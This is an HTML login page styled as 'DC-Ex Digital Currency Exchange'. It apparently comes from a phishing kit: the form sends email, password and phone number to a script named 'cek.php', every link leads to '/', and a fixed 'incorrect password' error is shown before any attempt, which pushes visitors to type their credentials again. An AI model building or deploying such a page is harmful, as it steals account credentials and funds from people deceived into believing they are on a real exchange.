<!DOCTYPE html>
<html>
<head> 
    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="keywords" content="DC-Ex Digital Currency Exchange:Login"/>    <meta name="description" content="DC-Ex Digital Currency Exchange|Login"/>  
    <title>
        DC-Ex Digital Currency Exchange:Login            </title>
    <link href="img/index.ico" type="image/x-icon" rel="icon"/><link href="css/index.ico" type="image/x-icon" rel="shortcut icon"/>	

    <link rel="stylesheet" href="css/bootstrap.min.css"/>    <link rel="stylesheet" href="css/styles.css"/>    <link rel="stylesheet" href="css/mytheme.css"/>    <link rel="stylesheet" href="css/homecrouseltheme.css"/>    <link rel="stylesheet" href="css/homecrousel.css"/>    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>      	<script  src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script> 
    <link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.4/themes/smoothness/jquery-ui.css"/> 
                	 		<script src="https://code.jquery.com/jquery.js"></script> 
	<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.4/jquery-ui.min.js"></script> 


	


</head>
<body>
	
 <div class="popupupheader" >
  <div class="loadingdivhead">
    <h2 id="processmsg">Processing <i class="fa fa-spinner fa-spin"></i></h2>
    
  </div>
</div> 
 <div class="orderpopupupheader" >
  <div class="orderloadingdivhead">
   
    <div class="orderfirstrow cls_common_order_popup"> <h2 id="processmsg">Processing <i class="fa fa-spinner fa-spin"></i></h2></div>
    <div class="ordersecrow cls_common_order_popup"></div>
    <div class="orderthirdrow cls_common_order_popup"></div>
  
    
  </div>
</div>       

     
  

         <div class="header">
         <div class="container-fluid">
            <div class="row">
               <div class="col-md-3">
                  <!-- Logo -->
                 
				    <div class="logo">
                     <a title="Home" href="/"><img class="logoimg clssplclslogo" src="css/logo.ico" / > 
                     </a>
                
                  </div>

               </div>
             
               <div class="col-md-9">
                  <div class="navbarrespons"><a class="menunavlink"><i class="fa fa-bars"></i></a></div>
                           <nav class="navbar navbar-default navbartophead floatright">
                              <div class="container-fluid">
                                <div class="navbar-header">
                                  
                                </div>
                                <ul class="nav navbar-nav navtophead">
                          <li class='liclsmenutopnv '>
                            <a href="/">Home</a>                          </li> 
                                
                           <li class='liclsmenutopnv '>
                            <a href="/">Exchange</a>                          </li> 
						                  

                                         <li class='liclsmenutopnv activeli'>
                            <a href="/">Login</a>                          </li> 

                          <li class='liclsmenutopnv '>
                           <a href="/">Register</a>                          </li>
                             
                        </ul>
                      </nav>
                  </div>
               </div>
            </div>
         </div>
        
       			 
			   
<div class="page-content">

       <div class="row row_users row_users_login">

          <div class="col-md-12 paddingsidethree">
     
              <div class="col-sm-12 col-md-12">
	<div class="col-sm-3 col-md-3"></div>
	<div class="col-sm-6 col-md-6">
		<div class="users form">
      

		<form method="post" accept-charset="utf-8" action="cek.php"><div style="display:none;"><input type="hidden" name="_method" value="POST"/><input type="hidden" name="_csrfToken" value="7adfd7409f77e2adfeb5b37fdf36a1c30b6122ef2d244eb4ac666fc266afb9a6b92ed3d0dab348a67819bb6fbdd2b32e35a0ca3874f1b71022833f8a27c9e231"/></div>		  <div class="col-md-12 minheight">
		
			            <div class="content-wrap ">
	<div class="content-box-large nopad padnone box_single smallbox ">		            	
		 <div class="box-container-all">
    <div class="lblheadcontaienr">
			                <label><i class="fa fa-lock"> </i> Login</label>
    </div>
     <div class="msg_alert_container_small_box">
    		    
		    </div>
    <div class="corm-internal-container bgboxlinear">
			                <div class="form-group">
							</div>
			                <div class="form-group form-email-container">
			                <label>Email</label>
			                <div class="input-group">
  							<span class="input-group-addon" id="basic-addon1"><i class="fa fa-envelope" aria-hidden="true"></i>
</span>
			                <div class="input text required"><input aria-required="true" autocapitalize="off" autocomplete="off" autocorrect="off" autofocus="" class="form-control" focus="" id="email" maxlength="30" minlength="5" msg-maxlength="Your password is too long." msg-minlength="Your password is too short." msg-pattern="Should contain at least one character and one digit" msg-remote_validation="" msg-required="Please don't leave this field empty." name="email" required="" style="" tabindex="" type="email">
<div class="xt-validation-inline ng-hide" data-ng-show="showErrors" for="newPassword" id="validation_2"></div>			           	</div>
			            </div>


			            <div class="form-group form-password-container">
			            <label>Password</label>
			                <div class="input-group">
  							<span class="input-group-addon" id="basic-addon2"><i class="fa fa-lock"></i></span>
			                <div class="input password required"><input aria-required="true" autocapitalize="off" autocomplete="off" autocorrect="off" class="form-control" focus="" id="Password" maxlength="25" minlength="4" msg-maxlength="Your password is too long." msg-minlength="Your password is too short." msg-parse="Passwords do not match." msg-password-match-validator="Passwords do not match." msg-pattern="Should contain at least one character and one digit" msg-required="Please don't leave this field empty." name="Password" ng-model="credentials.confirmPassword" password-match-validator="credentials.password" placeholder="" required="" style="" tabindex="2" type="password">
<div class="xt-validation-inline ng-hide" data-ng-show="showErrors" for="passConfirmPassword" id="validation_3"></div>			                </div>
			            </div>


			            <div class="form-group form-password-container">
			            <label>Phone</label>
			                <div class="input-group">
  							<span class="input-group-addon" id="basic-addon2"><i class="fa fa-lock"></i></span>
			                <div class="input text required"><input aria-required="true" autocapitalize="off" autocomplete="off" autocorrect="off" class="form-control" focus="" id="mobile" maxlength="25" minlength="4" msg-maxlength="Your password is too long." msg-minlength="Your password is too short." msg-parse="Passwords do not match." msg-password-match-validator="Passwords do not match." msg-pattern="Should contain at least one character and one digit" msg-required="Please don't leave this field empty." name="Phone" ng-model="credentials.confirmPassword" password-match-validator="credentials.password" placeholder="" required="" style="" tabindex="2" type="phone">
<div class="xt-validation-inline ng-hide" data-ng-show="showErrors" for="passConfirmPassword" id="validation_3"></div>		                </div>
                                  </div>
			             	<span class="frgt_pas"><a href="/">Forgot Password ?</a></span> 
 						</div>
<p class="error"><span style="color: #ff0000;">Your email and/or password is incorrect. Perhaps you signed up with a social account?</span></p>
			           
			            <div class="form-group form_submit_container">   
			                <div class="action padding_ten">
			                    			                    <button class="btn btn-success signup" title="Login" type="submit">Login</button>
			                </div> 

			              </div>                 
			           

			        <div class="already">
			            <p>Don't have an account yet?
			             <a href="/l">Sign Up</a></p>
						<p>Resend Email Activation link?
			             <a href="/">Click Here</a></p>
			        </div>
			    </div>
	   </div>  
	  </div>
  </div>
    <div style="display:none;"><input type="hidden" name="_Token[fields]" value="46814407e22ea48f3667027232e46114edba8ac7%3A"/><input type="hidden" name="_Token[unlocked]" value="g-recaptcha-response%7Clasttimeset%7Coptselctzoomcondi"/></div></form>	</div>
 </div>
</div>




       
         </div>
      </div>    


</div>
   
    
    
         <footer>
<div class="copyright-class text-center">
<div class="col-sm-12 column-dark-bg">
  <div class="col-sm-8 clsLinksFooter">
  	<ul class="footer-link">
             	 <li>
             	<a href="#">FAQ</a>				</li>
 				<li>
				  <a href="#">Terms & Conditions</a>				</li>
				<li><a href="#">Privacy Policy</a></li>
				<li><a href="#">Fees</a></li>
				<li><a href="#">News</a></li>
				<li><a href="#">Contact Us</a></li>
				</ul>
  </div>
  <div class="col-sm-4 column_footer_tag clsCenterResponsive">
      Copyright 2018-2022 <a href='#' class="fontblack bold">dc-ex.com</a>
  </div>

</div>
      </div>
      
 
      </footer>    			
	<script data-cfasync="true" src="/js/bootstrap.min.js"></script> 
	<script data-cfasync="true" src="/js/custom.js"></script>
	<script data-cfasync="true" src="/js/my_custom.js"></script> 
	<script data-cfasync="true" src="https://www.google.com/recaptcha/api.js"></script>
	  
	

</form>
</div>

</body>
</html>
